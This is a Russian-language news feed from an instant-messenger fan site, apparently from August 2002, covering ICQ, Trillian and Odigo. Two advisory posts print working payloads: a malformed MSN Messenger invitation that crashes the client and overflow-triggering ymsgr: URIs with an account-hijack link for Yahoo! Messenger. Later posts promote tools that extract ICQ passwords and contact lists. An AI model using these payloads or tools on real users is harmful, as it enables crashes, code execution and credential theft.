ICQ скачали более 200 миллионов человек
Понедельник, 5 августа 2002 г.Просмотров: 468
Подписаться на комментарии по RSS
Компании America Online и CNET Networks объявили о том, что программа ICQ скачивалась с сайта Download.com уже более 200 миллионов раз. Известный интернет-пейджер стал самой скачиваемой программой сайта Download.com, который принадлежит сети CNET. Download.com - один из крупнейших сайтов, на котором хранятся более 50000 бесплатных и пробных версий различных программ. По информации владельцев сайта, посетители Download.com ежедневно скачивают около 2,5 миллионов файлов.
ICQ была создана израильской компанией Mirabilis в 1996 году, а в 1998 году эта программа и сопутствующий сервис были приобретены AOL. Сейчас технология ICQ полностью принадлежит американской интернет-компании America Online. Возникнув как одно из первых средств обмена сообщениями через интернет, ICQ превратилась сегодня в огромный международный коммуникационный центр, имеющий более 130 миллионов зарегистрированных пользователей во всем мире.
Каждый зарегистрированный пользователь ежедневно подключается к сервису ICQ и пользуется им, в среднем, около четырех часов. Впервые программа появилась на сайте Download.com в 1996 году, затем на сайт выкладывались ее новые версии, и каждая из них неизменно входила в список самых популярных программ, скачиваемых с этого сайта. В настоящее время на сайте download.com можно скачать самую последнюю версию ICQ 2002a.
УНИВЕРСАЛЬНЫЙ ИНТЕРНЕТ-ПЕЙДЖЕР: ГОНКА ЗА ЛИДЕРАМИ
Понедельник, 5 августа 2002 г.Просмотров: 478
Подписаться на комментарии по RSS
Jupiter Media Metrix замерила рост числа пользователей нового интернет-пейджера Trillian, который позволяет общаться между собой пользователям систем мгновенного обмена сообщениями Yahoo, MSN, AOL и ICQ. Популярность универсальной программы растет значительно быстрее, чем это имело место у отдельных сервисов, с которыми она совместима. Только за февраль аудитория Trillian возросла с 344 000 до 610 000 пользователей. В сравнении с десятками миллионов пользователей лидеров рынка AIM и ICQ по абсолютной величине, это не много. Но темпы роста подтверждают востребованность в народе совместимости и интеграции данных сервисов.
Удаленный DoS через некорректный заголовок Invitation-Cookie в MSN Messenger
Понедельник, 5 августа 2002 г.Просмотров: 459
Подписаться на комментарии по RSS
Msn Messenger - популярный интернет пейджер от Microsoft для Windows систем.
Уродливый запрос, содержащий закодированные символы пробела (%20) в поле Invitation-Cookie, посланный удаленному пользователю, может привести к зависанию клиента Microsoft MSN Messenger.
Уязвимость обнаружена в Microsoft MSN Messenger Service 1.0-4.6
Пример:
MIME-Version: 1.0
Content-Type: text/x-msmsgsinvite; charset=UTF-8
Application-Name: Remote Assistance
Application-GUID: {56b994a7-380f-410b-9985-c809d78c1bdc}
Session-Protocol: SM1
Application-URL: http://www.microsoft.com
Invitation-Command: INVITE
Invitation-Cookie: 54902160%20%20%20%20%20%20%20%20%20%20%
20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20
Session-ID: {8B1BE64F-4019-489D-B1A3-EC0BA993651B}
Удаленное выполнение команд и похищение учетной записи в Yahoo! Messenger
Понедельник, 5 августа 2002 г.Просмотров: 449
Подписаться на комментарии по RSS
1. Переполнение буфера
Yahoo! Messenger при установке конфигурирует URI обработчик 'ymsgr:'. Обработчик вызывает YPAGER.EXE со снабженными параметрами. YPAGER.EXE принимает параметр 'call'; он используется для запуска особенности 'Call Center'.
Переполнение буфера в 'Call Center' можно вызвать через специально сконструированный URI. Переполнение произойдет, если параметр 'call', пропущенный к YPAGER.EXE, будет более 268 байт.
Пример: ymsgr:call?+
Другие параметры также восприимчивы к переполнению буфера (но параметр должен быть на 100 байтов больше):
ymsgr:sendim?+/aaaaaaa..... 368 bytes here/
ymsgr:chat?+/aaaaaa..... 368 bytes here/
ymsgr:addview?+/aaaaaa..... 368 bytes here/
ymsgr:addfriend?+/aaaaaa..... 368 bytes here/
Уязвимость может использоваться для удаленного выполнения произвольного кода на уязвимой системе.
2. Похищение учетной записи пользователя
URL, начинающиеся с "ymsgr:addview?" позволяют пользователям добавлять Web содержание Yahoo! к "Content Tabs" YIM для последующего просмотра в YIM, без web-браузера. YIM устанавливает по умолчанию настройки просмотра календаря, погоды, новостей и т.п.
Следующий URL демонстрирует уязвимость ( у вас должен быть установлен YaHoo! Messenger (YIM) интегрированный в совместимый Web браузер):
ymsgr:addview?http://rd.yahoo.com/messenger/?http://viceconsulting.com/cons/servs/infosec/yimvul001/DemH0.htm Уязвимость позволяет копировать почти любое содержание YIM ( в т.ч. и данные учетной записи) и вставлять произвольные сценарии, которые будут выполнены на YIM машине пользователей.
Уязвимость обнаружена в Yahoo! Messenger 5.0
Создателя интернет-пейджера Odigo покупают
Понедельник, 5 августа 2002 г.Просмотров: 542
Подписаться на комментарии по RSS
Американская компания Comverse, подразделение Comverse Technology, купила компанию Odigo, создавшую одноименный аналог ICQ. Цена сделки - около 20 млн. долларов. К этому моменту Comverse уже являлась акционером Odigo - ей принадлежали 12,4% акций.
Odigo, известная в России своим интернет-пейджером, совместимым с ICQ, кроме него, создала системы обмена сообщениями и для платформ Pocket PC, Palm, для Compaq Blackberry, для мобильных телефонов с WAP и Java, а в перспективе, у нее появятся разработки для I-Mode, Symbian и BREW. Все эти наработки Odigo будут применены в новых продуктах Comverse - чатах, SMS и MMS, голосовой почте, конференц-связи и других. Цель компании - создать основанную на IP-протоколе открытую платформу для операторов мобильной связи поколения 3/2.5, на которой они могли бы быстро разворачивать подобные сервисы.
На club.handy.ru можно почитать статью Тестируем «аську» на Pocket PC.
Icq History Reader GUI 0.94b
Понедельник, 5 августа 2002 г.Просмотров: 488
Подписаться на комментарии по RSS
Специально для нашего сайта Azeron написал GUI-оболочку к Icq History Reader 1.7, которая меняет консольный вид приложения на оконный. Теперь использовать прогу значительно удобнее. Наличие самого ICQHR обязательно. Azeron'у огромный thx от всех нас. Берем тут.
Никакого отношения к самому History Reader'у эта примочка не имеет. Сам History Reader с нашего сайта вообще скачивать нельзя , мы его тут для личных нужд держим. Любые совпадения - случайны, и вообще весть текст этого поста был получен с помощью генератора случайных текстов, а выложил я его для прикола.
Icq History Reader 1.7
Понедельник, 5 августа 2002 г.Просмотров: 461
Подписаться на комментарии по RSS
Обновилась прога для вытаскивания History из dat файла. По сравнению с версией 1.4, о которой мы когда-то писали, появилось много улучшений. Программа научилась вытягивать инфу, пароль и контакт лист. Теперь все экспортируется не в текстовый документ, а в веб страницу, которая чем то напоминает функцию export to html из ICQr Information 1.5. Также есть версия для линуксоидов.
Софтина по прежнему имеет консольный вид. Для тех, кто не в курсе, что это за зверь, прилагается FAQ. Аналогов программы пока не существует. Забираем.
Самая маленькая в мире прога для вскрытия дат файлов
Понедельник, 5 августа 2002 г.Просмотров: 480
Подписаться на комментарии по RSS
Ознакомиться с этим творением можно здесь.
Весит всего 13кб. При запуске создает в папке, где лежит, файл с паролями, которые есть в системе. Тут лежит версия, которая открывает окошко с паролями, прилагаются исходники.
Мирабы обновили Web аську
Понедельник, 5 августа 2002 г.Просмотров: 535
Подписаться на комментарии по RSS
А заодно сменили и местопребывание. Находится по адресу http://go.icq.com. О том чего нового можно почитать там же. Но если мне все же приходится иногда пользоваться онлайновыми аськами, то я просто нажимаю кнопку WebICQ на нашем сайте. Мне этого вполне хватает.